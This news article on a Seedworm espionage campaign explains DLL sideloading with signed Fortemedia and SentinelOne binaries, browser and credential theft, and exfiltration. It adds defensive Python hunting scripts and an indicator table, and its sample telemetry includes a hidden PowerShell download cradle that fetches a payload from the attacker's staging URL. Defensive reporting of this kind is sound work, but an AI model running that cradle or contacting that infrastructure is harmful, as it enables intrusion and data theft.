Iran-Linked Seedworm Hackers Abuse Signed Fortemedia and SentinelOne Binaries in Espionage Campaign
Iran-linked Seedworm hackers have been tied to a new cyber-espionage campaign that abused signed Fortemedia and SentinelOne binaries to sideload malicious DLL files on victim systems.
The campaign targeted at least nine organizations across nine countries and four continents during the first quarter of 2026. Victims included a major South Korean electronics manufacturer, government agencies, industrial manufacturers, financial services firms, educational institutions, and an international airport in the Middle East.
Symantec’s Threat Hunter Team linked the activity to Seedworm, also tracked as MuddyWater, Static Kitten, TEMP.Zagros, and Mango Sandstorm. The group is widely associated with Iran’s Ministry of Intelligence and Security and has a long history of cyber-espionage operations.
What happened in the Seedworm campaign
The most notable intrusion involved a major South Korean electronics manufacturer. Researchers said Seedworm remained inside the company’s network for about a week in February 2026, between February 20 and February 27.
The attackers appeared focused on intelligence collection, credential theft, and network access rather than quick disruption. Their targets suggest an interest in intellectual property, government information, sensitive business data, and possible downstream access to customers or partners.
The campaign also showed a more disciplined approach than older Seedworm activity. The group used legitimate tools, signed binaries, Node.js-based loaders, PowerShell scripts, public file-transfer services, and multiple credential theft methods to reduce detection opportunities.
How the DLL sideloading worked
Seedworm used DLL sideloading, a technique in which attackers place a malicious DLL next to a legitimate executable that imports a DLL of that name. Because Windows resolves most DLL imports from the application’s own directory before it checks the system directories, the planted file is loaded under the identity of the trusted, signed process.
In this campaign, the attackers used fmapp.exe, a legitimate Fortemedia audio-driver utility, to load a malicious DLL named fmapp.dll. They also used sentinelmemoryscanner.exe, a legitimate SentinelOne component, to load a malicious DLL named sentinelagentcore.dll.
This does not mean Fortemedia or SentinelOne were compromised. The attackers abused trusted, signed software to make malicious execution look less suspicious during endpoint review.
| Technique | Legitimate file abused | Malicious file loaded | Purpose |
|---|---|---|---|
| DLL sideloading | fmapp.exe | fmapp.dll | Load malicious code through a trusted Fortemedia utility |
| DLL sideloading | sentinelmemoryscanner.exe | sentinelagentcore.dll | Load malicious code through a trusted SentinelOne component |
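The following Python is an added example for this article, not code from Symantec, Fortemedia or SentinelOne. It triages Sysmon-style image-load records (Event ID 7 fields joined with the parent image from Event ID 1) for the pattern described above: a signed executable running from a user-writable path, loading an unsigned or differently signed DLL from its own directory, launched by an automation parent such as node.exe. The records, paths, signer strings and the benign vendor entry are constructed assumptions; only the executable/DLL names and the node.exe parent come from the article.

```python
"""Triage Sysmon-style image-load events for DLL sideloading.

Added example; not vendor or Symantec code. Fields mimic Sysmon Event ID 7
(Image, ImageLoaded, Signed/Signature) plus the parent image. All sample
paths, signer strings and the benign "ExampleVendor" record are constructed.
"""
from dataclasses import dataclass
import ntpath

# Where signed vendor binaries normally live (lower-cased, trailing backslash).
TRUSTED_ROOTS = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
)
# Parents that should not normally be launching signed vendor utilities.
SUSPICIOUS_PARENTS = {"node.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe", "rundll32.exe"}
# Executable/DLL pairs reported in the campaign (from the article).
KNOWN_PAIRS = {("fmapp.exe", "fmapp.dll"),
               ("sentinelmemoryscanner.exe", "sentinelagentcore.dll")}


@dataclass
class ImageLoad:
    image: str          # process image that loaded the module
    image_signer: str   # publisher of the process image ("" if unsigned)
    loaded: str         # module path (Sysmon ImageLoaded)
    loaded_signer: str  # publisher of the module ("" if unsigned)
    parent: str         # parent process image


def _dir(path: str) -> str:
    return ntpath.dirname(path.lower()) + "\\"


def _name(path: str) -> str:
    return ntpath.basename(path.lower())


def triage(ev: ImageLoad) -> list[str]:
    """Return reasons an image load looks like sideloading; empty list = benign."""
    reasons: list[str] = []
    exe, dll = _name(ev.image), _name(ev.loaded)
    if not ev.image_signer:
        return reasons  # unsigned loader: not the trusted-binary abuse discussed here
    same_dir = _dir(ev.image) == _dir(ev.loaded)
    if same_dir and not _dir(ev.image).startswith(TRUSTED_ROOTS):
        reasons.append(f"signed {exe} running from non-vendor path {_dir(ev.image)}")
    if same_dir and not ev.loaded_signer:
        reasons.append(f"{dll} loaded from the application directory is unsigned")
    elif same_dir and ev.loaded_signer.lower() != ev.image_signer.lower():
        reasons.append(f"{dll} signed by {ev.loaded_signer!r}, loader signed by {ev.image_signer!r}")
    if _name(ev.parent) in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {_name(ev.parent)}")
    if (exe, dll) in KNOWN_PAIRS and reasons:
        reasons.append("matches executable/DLL pair reported by Symantec")
    return reasons


def hunt(events: list[ImageLoad]) -> dict[str, list[str]]:
    """Map each suspicious process image to its triage reasons."""
    return {ev.image: triage(ev) for ev in events if triage(ev)}


# Constructed sample telemetry (signer strings are placeholders, not observed values).
SAMPLE_EVENTS = [
    ImageLoad(r"C:\Program Files\ExampleVendor\tool.exe", "Example Vendor Inc.",
              r"C:\Program Files\ExampleVendor\helper.dll", "Example Vendor Inc.",
              r"C:\Windows\explorer.exe"),
    ImageLoad(r"C:\Users\Public\Libraries\fmapp.exe", "Fortemedia (assumed signer)",
              r"C:\Users\Public\Libraries\fmapp.dll", "",
              r"C:\ProgramData\nodejs\node.exe"),
    ImageLoad(r"C:\Users\Public\Libraries\sentinelmemoryscanner.exe", "SentinelOne (assumed signer)",
              r"C:\Users\Public\Libraries\sentinelagentcore.dll", "",
              r"C:\ProgramData\nodejs\node.exe"),
]

if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS).items():
        print(image)
        for r in reasons:
            print("  -", r)
```

The checks are deliberately independent of hashes: a repacked fmapp.dll would still trip the path, signature and parent tests, which is why the later indicator table should be treated as hunting leads rather than the whole detection.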
ChromElevator used for browser data theft
The malicious DLL files carried ChromElevator, a post-exploitation tool designed to steal data from Chromium-based browsers.
That can include saved passwords, cookies, browsing history, and payment card details stored in browser profiles. Stolen session cookies are especially valuable: as long as the sessions remain valid, they let attackers into corporate web applications without a password or a second authentication factor.
Researchers also found that node.exe launched the sideloading chains in observed cases. This suggests automated Node.js-based tooling drove parts of the operation, rather than a hands-on operator manually launching every step.
Seedworm used PowerShell, registry changes, and credential tools
After gaining access, Seedworm used PowerShell for reconnaissance, screenshots, payload downloads, persistence, credential theft, and SOCKS5 proxy tunneling.
The group also made registry changes to keep its loader chain running after user login. This gave the attackers a way to maintain access even after a restart or user session change.
Credential theft played a central role in the campaign. The attackers dumped Windows registry hives, used fake Windows login prompts, and deployed tools that could extract Kerberos tickets without requiring a domain administrator password.
- Host and domain reconnaissance helped Seedworm map the victim environment.
- WMI checks helped the attackers identify security products.
- Screenshot capture gave visibility into user activity and system state.
- Registry hive theft provided material for offline password cracking.
- Fake login prompts helped collect plaintext credentials.
- SOCKS5 proxy tooling supported stealthy network access.
Data was moved through a public file-transfer service
Seedworm used sendit.sh, a public file-transfer service, to exfiltrate stolen data. This choice can help malicious transfers blend into normal outbound web traffic.
Public file-sharing services create a challenge for defenders because they often appear in legitimate business workflows. Blocking them outright may disrupt users, but ignoring them gives attackers an easy exfiltration path.
Security teams should monitor unexpected uploads to consumer file-transfer platforms, especially from sensitive systems, administrator workstations, development machines, and servers with access to confidential data.
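One way to turn that monitoring advice into a hunt, as an added example that is not tooling from Symantec or the campaign: the Python below parses web-proxy log lines, keeps upload requests (POST/PUT/PATCH) to public file-transfer domains, and flags hosts that either are tagged sensitive or send more than a byte threshold to such services. The log layout (a space-separated export with a client-bytes column), the host tags and the upload paths are assumptions; only the sendit.sh domain comes from the article, and every log line is constructed.

```python
"""Hunt proxy logs for uploads to public file-transfer services.

Added example for this article; not Symantec or vendor tooling. The log
format (ts host src_ip method url status client_bytes) and the sensitive
host tags are assumptions. All log lines below are constructed.
"""
from collections import defaultdict
from urllib.parse import urlsplit

FILE_TRANSFER_DOMAINS = {"sendit.sh"}                 # from the article; extend with services seen in your environment
SENSITIVE_HOSTS = {"adm-ws01", "build-01", "dc01"}    # assumed asset tags (admin, build, domain controller)
UPLOAD_METHODS = {"POST", "PUT", "PATCH"}
BYTES_THRESHOLD = 5 * 1024 * 1024                      # flag any host sending more than 5 MiB


def parse_line(line: str):
    """Parse one log line into a dict; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    ts, host, src_ip, method, url, status, cbytes = parts
    try:
        nbytes = int(cbytes)
    except ValueError:
        return None
    return {"ts": ts, "host": host, "src_ip": src_ip, "method": method.upper(),
            "url": url, "status": status, "bytes": nbytes}


def is_transfer_service(url: str) -> bool:
    """True if the URL's host is, or is a subdomain of, a listed transfer service."""
    hostname = (urlsplit(url).hostname or "").lower()
    return any(hostname == d or hostname.endswith("." + d) for d in FILE_TRANSFER_DOMAINS)


def hunt_uploads(lines):
    """Return {host: {bytes, requests, sensitive}} for hosts whose uploads to transfer services warrant review."""
    totals = defaultdict(lambda: {"bytes": 0, "requests": 0, "sensitive": False})
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] not in UPLOAD_METHODS or not is_transfer_service(rec["url"]):
            continue
        t = totals[rec["host"]]
        t["bytes"] += rec["bytes"]
        t["requests"] += 1
        t["sensitive"] = rec["host"] in SENSITIVE_HOSTS
    return {h: t for h, t in totals.items() if t["sensitive"] or t["bytes"] > BYTES_THRESHOLD}


# Constructed sample log lines: an admin workstation, a marketing host with a
# small upload, and an engineering host pushing 8 MiB.
SAMPLE_LOG = [
    "2026-02-21T02:14:09Z adm-ws01 10.20.0.15 POST https://sendit.sh/ 200 734003200",
    "2026-02-21T09:30:11Z mkt-ws22 10.20.1.40 POST https://sendit.sh/ 200 1048576",
    "2026-02-21T09:31:00Z mkt-ws22 10.20.1.40 GET https://sendit.sh/ 200 0",
    "2026-02-21T10:00:00Z eng-ws07 10.20.2.9 PUT https://sendit.sh/ 200 8388608",
    "2026-02-21T10:05:00Z eng-ws07 10.20.2.9 POST https://intranet.example.local/api 200 4096",
]

if __name__ == "__main__":
    for host, t in hunt_uploads(SAMPLE_LOG).items():
        tag = "sensitive host" if t["sensitive"] else "volume"
        print(f"{host}: {t['bytes']} bytes in {t['requests']} upload(s) [{tag}]")
```

Aggregating per host rather than alerting per request keeps small, legitimate shares below the threshold while still catching a single large dump or many chunked uploads from one machine.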
Key indicators of compromise
Defenders can use the following indicators as hunting leads. They should not rely only on hashes and IP addresses, since attackers can change infrastructure quickly.
| Type | Indicator | Description |
|---|---|---|
| SHA-256 | e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b | fmapp.exe legitimate sideloading binary |
| SHA-256 | c6182fd01b14d84723e3c9d11bc0e16b34de6607ccb8334fc9bb97c1b44f0cde | fmapp.dll malicious sideloaded DLL |
| SHA-256 | 128b58a2a2f1df66c474094aacb7e50189025fbf45d7cd8e0834e93a8fbed667 | sentinelmemoryscanner.exe legitimate sideloading binary |
| SHA-256 | 0c9b911935a3705b0ad569446804d80026feb6db3884aeb240b6c76e9b8cf139 | sentinelagentcore.dll malicious sideloaded DLL |
| IP address | 179.43.177[.]220 | Attacker-controlled staging server |
| Domain | timetrakr[.]cloud | Attacker-owned staging domain |
| Domain | sendit[.]sh | Public file-transfer service used for exfiltration |
| URL | http://179.43.177[.]220:8080/nm.ps1 | PowerShell payload download URL |
Why this matters for defenders
The campaign shows how state-linked actors can use legitimate software to hide malicious activity. Signed binaries often receive more trust from users, security tools, and incident responders.
DLL sideloading also makes detection harder because the visible process may appear legitimate. The real payload may sit in the DLL loaded by that trusted executable.
Organizations should treat unusual combinations of signed executables and unexpected DLL files as suspicious, especially when they appear in temporary directories, user-writable folders, staging paths, or locations unrelated to the original vendor software.
What security teams should check
Security teams should review endpoint telemetry for unusual node.exe process trees, PowerShell downloads from external servers, and signed binaries loading DLL files from suspicious locations.
They should also review registry run keys, scheduled tasks, browser credential access, file-transfer activity, and outbound connections to known infrastructure from the campaign.
Because Seedworm used several credential theft methods, responders should assume that affected hosts may expose both browser credentials and Windows authentication material.
- Search for fmapp.exe loading fmapp.dll from unexpected paths.
- Search for sentinelmemoryscanner.exe loading sentinelagentcore.dll outside normal product directories.
- Review node.exe processes that launch signed third-party binaries or PowerShell.
- Check PowerShell logs for downloads from external IP addresses or unknown domains.
- Audit registry run keys for suspicious persistence entries.
- Review outbound transfers to public file-sharing platforms.
- Rotate credentials from systems where browser or registry hive theft is suspected.
- Review Kerberos activity for unusual ticket extraction or lateral movement patterns.
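The following Python is an added example for this article, not a Symantec or vendor detection rule, that runs several of the checks above over constructed Sysmon-style telemetry: process-creation records (Event ID 1) are walked by parent PID to find signed binaries or PowerShell descending from node.exe, PowerShell command lines are inspected for download cradles that fetch from public IPs or non-corporate names, and registry value-set records (Event ID 13) are checked for Run-key entries pointing at user-writable paths or at node.exe. All PIDs, paths, the SID and the corporate domain are constructed assumptions; the PowerShell download URL is the one listed in the indicator table.

```python
"""Hunt constructed Sysmon-style telemetry for node.exe-driven chains,
PowerShell download cradles and Run-key persistence.

Added example; not Symantec or vendor code. Event dicts mimic Sysmon Event
ID 1 (process create) and 13 (registry value set). Every PID, path, SID and
host name here is constructed; the download URL is from the article's IOC table.
"""
import ipaddress
import ntpath
import re
from urllib.parse import urlsplit

AUTOMATION_PARENTS = {"node.exe"}              # parent seen launching the chains in this campaign
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
INTERNAL_DOMAINS = ("corp.example.local",)      # assumed corporate zone; downloads from here are not flagged
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
CRADLE_RE = re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|"
                       r"DownloadFile|Net\.WebClient|Start-BitsTransfer", re.I)
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Windows\\Temp)\\", re.I)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def external_urls(cmdline: str) -> list[str]:
    """URLs in a command line that point at public IP literals or non-corporate names."""
    found = []
    for url in URL_RE.findall(cmdline):
        host = (urlsplit(url).hostname or "").lower()
        try:
            if ipaddress.ip_address(host).is_global:
                found.append(url)
        except ValueError:                         # a hostname, not an IP literal
            if host and not host.endswith(INTERNAL_DOMAINS):
                found.append(url)
    return found


def ancestors(pid: int, by_pid: dict) -> list[str]:
    """Image names of a process's parents, nearest first, following ppid links."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            chain.append(_name(by_pid[pid]["image"]))
    return chain


def hunt(events: list[dict]) -> list[dict]:
    """Return one finding per suspicious event: {pid, image, reasons}."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    findings = []
    for e in events:
        reasons, image = [], _name(e["image"])
        if e["id"] == 1:
            auto = [a for a in ancestors(e["pid"], by_pid) if a in AUTOMATION_PARENTS]
            if auto:
                reasons.append(f"{image} descends from {auto[0]}")
            if image in SCRIPT_HOSTS and CRADLE_RE.search(e["cmdline"]):
                for url in external_urls(e["cmdline"]):
                    reasons.append(f"download cradle fetching {url}")
        elif e["id"] == 13 and RUN_KEY_RE.search(e["target"]):
            details = e["details"]
            if USER_WRITABLE_RE.search(details) or any(p in details.lower() for p in AUTOMATION_PARENTS):
                reasons.append(f"Run key {e['target']} points at {details}")
        if reasons:
            findings.append({"pid": e["pid"], "image": image, "reasons": reasons})
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry
    {"id": 1, "pid": 4100, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"id": 1, "pid": 5120, "ppid": 4100, "image": r"C:\ProgramData\nodejs\node.exe",
     "cmdline": r"node.exe C:\ProgramData\nodejs\loader.js"},
    {"id": 1, "pid": 5200, "ppid": 5120, "image": r"C:\Users\Public\Libraries\fmapp.exe", "cmdline": "fmapp.exe"},
    {"id": 1, "pid": 5300, "ppid": 5120, "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://179.43.177.220:8080/nm.ps1')\""},
    {"id": 1, "pid": 6000, "ppid": 4100, "image": PS,
     "cmdline": "powershell.exe -c \"Invoke-WebRequest https://corp.example.local/scripts/inventory.ps1\""},
    {"id": 13, "pid": 5300, "image": PS,
     "target": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\ProgramData\nodejs\node.exe C:\ProgramData\nodejs\loader.js"},
    {"id": 13, "pid": 700, "image": r"C:\Program Files\ExampleVendor\setup.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExampleVendor",
     "details": r"C:\Program Files\ExampleVendor\tray.exe"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid {f['pid']} {f['image']}: " + "; ".join(f["reasons"]))
```

The internal PowerShell inventory script and the vendor installer’s own Run key are left unflagged on purpose; the point is to surface the combination of automation parent, external download and user-writable persistence path rather than every PowerShell download or every Run key.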
Seedworm’s campaign shows a quieter espionage model
Seedworm has used noisy and visible techniques in past campaigns, but this activity shows a more careful operating style.
The group combined trusted binary abuse, automated loaders, credential theft, persistence, proxy tooling, and public file-transfer services into a practical espionage workflow.
For defenders, the main lesson is that signed software alone does not prove safe behavior. Security teams need to monitor how trusted binaries run, what DLLs they load, where those files reside, and which parent processes launched them.
FAQ
Who is Seedworm?
Seedworm is an Iran-linked cyber-espionage group also tracked as MuddyWater, Static Kitten, TEMP.Zagros, and Mango Sandstorm. It has targeted government and private-sector organizations in multiple regions since at least 2017.
What did the campaign involve?
Seedworm targeted at least nine organizations across nine countries and four continents. The group abused signed Fortemedia and SentinelOne binaries for DLL sideloading, stole credentials, used PowerShell, and exfiltrated data through a public file-transfer service.
Were Fortemedia or SentinelOne breached?
The available reporting does not show that Fortemedia or SentinelOne were breached. The attackers abused legitimate signed binaries from those vendors to load malicious DLL files through sideloading.
What is DLL sideloading?
DLL sideloading is an attack technique in which a legitimate executable loads a malicious DLL file placed where the executable looks for it. Attackers use it to make malicious activity appear to come from trusted software.
What should organizations monitor?
Organizations should monitor unusual node.exe process trees, PowerShell downloads, signed binaries loading unexpected DLLs, registry persistence, browser credential access, public file-transfer uploads, and outbound traffic to known Seedworm infrastructure.